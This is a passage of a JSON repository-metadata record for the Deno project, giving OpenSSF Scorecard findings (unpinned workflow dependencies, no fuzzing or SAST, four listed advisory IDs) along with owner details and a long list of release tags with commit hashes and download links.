pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag